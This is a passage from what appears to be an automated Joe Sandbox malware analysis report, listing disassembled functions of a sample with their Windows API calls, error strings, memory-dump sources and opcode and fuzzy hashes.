                                                                  • Instruction ID: af9a2903090741bc871293769ecc8624fca9633cbdf0d4038191024760ffe1d3
                                                                  • Opcode Fuzzy Hash: 8547c02f49b4b8634ac1330e42a59f11ee9c016a13a5e9f5a0127b536ee8a594
                                                                  • Instruction Fuzzy Hash: 2C214FB16102569FCB145F39CC58AAE77ABEB45369F254739B926C72E0EE708890CF10
                                                                  Function 0068D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 0068D1BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: 834e266151c30422ccf0227b3e70ac14732af78ae2c58ebdaa01ba65169b7b0f
                                                                  • Instruction ID: 91d6b13f539197fb22af7bb78d224e6cf3a87a92636ae6c00e3e99b4af1a86c1
                                                                  • Opcode Fuzzy Hash: 834e266151c30422ccf0227b3e70ac14732af78ae2c58ebdaa01ba65169b7b0f
                                                                  • Instruction Fuzzy Hash: 5E11593164D306FAEB046B14DC87EEE37AF9F05760B20023AF940A63C1EBB1AA414774
                                                                  Function 0068E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 642191829-3771769585
                                                                  • Opcode ID: a9f961ffda5fa0133e0ee789e6aeecd8c862996eeef5ca5e06fd2e15fa8f56c7
                                                                  • Instruction ID: 857e20915fa4503c92f90d7e28a13b7dec7ee5c59565e2ce9fd9d3d1246249cd
                                                                  • Opcode Fuzzy Hash: a9f961ffda5fa0133e0ee789e6aeecd8c862996eeef5ca5e06fd2e15fa8f56c7
                                                                  • Instruction Fuzzy Hash: 5A11E471900115BBCB24B760DC4AEDE37AEDF01710F0002B9F505AA091FFB58A81C754
                                                                  Function 0068F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 952045576-0
                                                                  • Opcode ID: df4cc759375313698fc185f77ca666dd5dec56042341cc040c61af937e51e6e8
                                                                  • Instruction ID: ae768e7066d1e04f7855e79809b92d9009dc9707390473df5cf92df91c09aead
                                                                  • Opcode Fuzzy Hash: df4cc759375313698fc185f77ca666dd5dec56042341cc040c61af937e51e6e8
                                                                  • Instruction Fuzzy Hash: B441D365C00214B5DB51FBB8DC8AACFB3AEAF05310F01856AF508E3121FA74E251C3EA
                                                                  Function 006B379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 006B37B7
                                                                  • GetDC.USER32(00000000), ref: 006B37BF
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006B37CA
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 006B37D6
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006B3812
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006B3823
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006B6504,?,?,000000FF,00000000,?,000000FF,?), ref: 006B385E
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006B387D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: eff49a79332bbc2da58889aada07cfdd22480e65498be8c0f3c98e7d72517ff3
                                                                  • Instruction ID: 5f99256c87bf5c88bbd4a72622cd2b904d661b0c1c5351decd2183442129cca9
                                                                  • Opcode Fuzzy Hash: eff49a79332bbc2da58889aada07cfdd22480e65498be8c0f3c98e7d72517ff3
                                                                  • Instruction Fuzzy Hash: 4731A0B2201224BFEB154F54CC89FEB3BAEEF49711F044165FE089E291D6B59C81CBA4
                                                                  Function 006A5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: 8bc2c661f132333bd519d0c66a23da020637279d3a455e8420eca7df8bb95c61
                                                                  • Instruction ID: 442be8f04d6e6a60058d51af26a38567cdedcd06bf2e44c00d905dce2a7c2e01
                                                                  • Opcode Fuzzy Hash: 8bc2c661f132333bd519d0c66a23da020637279d3a455e8420eca7df8bb95c61
                                                                  • Instruction Fuzzy Hash: 9AD1B171A0060A9FDB10EF68C895AEEB7B6FF49314F148569E906AB381E770DD41CF60
                                                                  Function 006618A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0066194E
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 006619D1
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00661B7B,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00661A64
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00661A7B
                                                                    • Part of subcall function 00653B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00661AF7
                                                                  • __freea.LIBCMT ref: 00661B22
                                                                  • __freea.LIBCMT ref: 00661B2E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                  • String ID:
                                                                  • API String ID: 2829977744-0
                                                                  • Opcode ID: 40e78d00601b599a0c1f68279253231b6f2a02e584c2c034c37140440530879d
                                                                  • Instruction ID: 79113f456aa2114d1437259fcd129ba7558ec5467ea90194e385a85a24934bc7
                                                                  • Opcode Fuzzy Hash: 40e78d00601b599a0c1f68279253231b6f2a02e584c2c034c37140440530879d
                                                                  • Instruction Fuzzy Hash: 7D91C572E002569BDF248FA4C891AEE7BB79F0A750F1C0669E815EF240E735DD45CB60
                                                                  Function 006A4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 2610073882-625585964
                                                                  • Opcode ID: 14470536e4bc7d4e96d5a7a5be09efd47f6c77a82a53686415aac53f5b984d20
                                                                  • Instruction ID: 9c3347b8aabf77caf8cee9c75261ff2d518ccdc3c72d14245a00e63a32c5f973
                                                                  • Opcode Fuzzy Hash: 14470536e4bc7d4e96d5a7a5be09efd47f6c77a82a53686415aac53f5b984d20
                                                                  • Instruction Fuzzy Hash: 5A918D71A00615ABDF20DFA5C848FEEBBBAEF46314F108559F506AB280D7709D45CFA0
                                                                  Function 00691B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00691C1B
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691C43
                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00691C67
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691C97
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691D1E
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691D83
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691DEF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                  • String ID:
                                                                  • API String ID: 2550207440-0
                                                                  • Opcode ID: d3aec8b226ad54437df6dbe4870eac84258e595b58d170c10087a5e0ab7dc06c
                                                                  • Instruction ID: 07ba83c13127b3d6ec3b79cac823419fc61dd0a14391f7140e54a3e9ea287a77
                                                                  • Opcode Fuzzy Hash: d3aec8b226ad54437df6dbe4870eac84258e595b58d170c10087a5e0ab7dc06c
                                                                  • Instruction Fuzzy Hash: 4C91E075A0021AEFEF009F94C885BFEB7BAFF06715F204029E940AF691D778A945CB50
                                                                  Function 006A43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 006A43C8
                                                                  • CharUpperBuffW.USER32(?,?), ref: 006A44D7
                                                                  • _wcslen.LIBCMT ref: 006A44E7
                                                                  • VariantClear.OLEAUT32(?), ref: 006A467C
                                                                    • Part of subcall function 0069169E: VariantInit.OLEAUT32(00000000), ref: 006916DE
                                                                    • Part of subcall function 0069169E: VariantCopy.OLEAUT32(?,?), ref: 006916E7
                                                                    • Part of subcall function 0069169E: VariantClear.OLEAUT32(?), ref: 006916F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4137639002-1221869570
                                                                  • Opcode ID: c2306eba548c1e91b2e4a03f9193d133661eca602b0ed81f92dcdf55cf08e753
                                                                  • Instruction ID: 7a9bacf4c14d4c56299b09fb3b28598bbdd4fab405e0c7faa084e5fac080c610
                                                                  • Opcode Fuzzy Hash: c2306eba548c1e91b2e4a03f9193d133661eca602b0ed81f92dcdf55cf08e753
                                                                  • Instruction Fuzzy Hash: 43911374A087019FC744EF24C88096AB7E6EF8A714F14892DF8899B351DB71ED06CF82
                                                                  Function 006A560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?,?,00680C4E), ref: 0068091B
                                                                    • Part of subcall function 006808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680936
                                                                    • Part of subcall function 006808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680944
                                                                    • Part of subcall function 006808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?), ref: 00680954
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 006A56AE
                                                                  • _wcslen.LIBCMT ref: 006A57B6
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 006A582C
                                                                  • CoTaskMemFree.OLE32(?), ref: 006A5837
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 614568839-2785691316
                                                                  • Opcode ID: a45febe4a097dbb105e464f0c64f3ed20bc6754cc91f3e1f5e4cc325a76951d3
                                                                  • Instruction ID: bcc967348df76e9ee1cf6a1c37ed2310384c637d84fb7dd0d12dfe5ad622d98c
                                                                  • Opcode Fuzzy Hash: a45febe4a097dbb105e464f0c64f3ed20bc6754cc91f3e1f5e4cc325a76951d3
                                                                  • Instruction Fuzzy Hash: 70911871D00629EFDF10EFA4D890AEDB7BABF08310F104569E516AB251EB749E44CF60
                                                                  Function 006B2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 006B2C1F
                                                                  • GetMenuItemCount.USER32(00000000), ref: 006B2C51
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006B2C79
                                                                  • _wcslen.LIBCMT ref: 006B2CAF
                                                                  • GetMenuItemID.USER32(?,?), ref: 006B2CE9
                                                                  • GetSubMenu.USER32(?,?), ref: 006B2CF7
                                                                    • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
                                                                    • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
                                                                    • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006B2D7F
                                                                    • Part of subcall function 0068F292: Sleep.KERNEL32 ref: 0068F30A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                  • String ID:
                                                                  • API String ID: 4196846111-0
                                                                  • Opcode ID: 51ec37af7ed6c5a787a97a0faae5d2186e02328b6c9465d91fe654d5a810badc
                                                                  • Instruction ID: 1d5f15f9670af28d355f1650a8f72a39522b7308c7f8052036f0b91ec4d850fd
                                                                  • Opcode Fuzzy Hash: 51ec37af7ed6c5a787a97a0faae5d2186e02328b6c9465d91fe654d5a810badc
                                                                  • Instruction Fuzzy Hash: 5D7182B5A00216AFCB50DF64C855AEEBBF2EF48310F148469E816EB351DB34AD81CF90
                                                                  Function 0068B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0068B8C0
                                                                  • GetKeyboardState.USER32(?), ref: 0068B8D5
                                                                  • SetKeyboardState.USER32(?), ref: 0068B936
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 0068B964
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0068B983
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 0068B9C4
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0068B9E7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: fb296740cb8099cd9f2fa8f66e512969a64bbfdb17bd5aa2af16d79440a56d28
                                                                  • Instruction ID: 0894a149e6c4eeb8d461c9941b532333d18ba404d84b3eff952562c1b05c3ec1
                                                                  • Opcode Fuzzy Hash: fb296740cb8099cd9f2fa8f66e512969a64bbfdb17bd5aa2af16d79440a56d28
                                                                  • Instruction Fuzzy Hash: 375123A05087D53EFB3662388C55BFA7EAB9F06304F08A689E2D5459D2D3D8ECC4D750
                                                                  Function 0068B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 0068B6E0
                                                                  • GetKeyboardState.USER32(?), ref: 0068B6F5
                                                                  • SetKeyboardState.USER32(?), ref: 0068B756
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0068B782
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0068B79F
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0068B7DE
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0068B7FF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 7bdb386d70ebac718491ccaeee7e35558fcc73827cc9e2262e0d7e30aefa5280
                                                                  • Instruction ID: a0a7f4735f6d4921a7be994eee5ae8fa76ff1c3f9ffcd2b3235ab7f2dee4c370
                                                                  • Opcode Fuzzy Hash: 7bdb386d70ebac718491ccaeee7e35558fcc73827cc9e2262e0d7e30aefa5280
                                                                  • Instruction Fuzzy Hash: 615135A09487D53EFB32A334CC11BBABEAA5B06304F0C968DE0D54A9C2D394ECC4D754
                                                                  Function 006557A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00655F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 006557E3
                                                                  • __fassign.LIBCMT ref: 0065585E
                                                                  • __fassign.LIBCMT ref: 00655879
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0065589F
                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,00655F16,00000000,?,?,?,?,?,?,?,?,?,00655F16,?), ref: 006558BE
                                                                  • WriteFile.KERNEL32(?,?,00000001,00655F16,00000000,?,?,?,?,?,?,?,?,?,00655F16,?), ref: 006558F7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: 03c8ad4d04c3024dcd07658331099b89ba576fbee1aa4e656d01a2db26b2fe0d
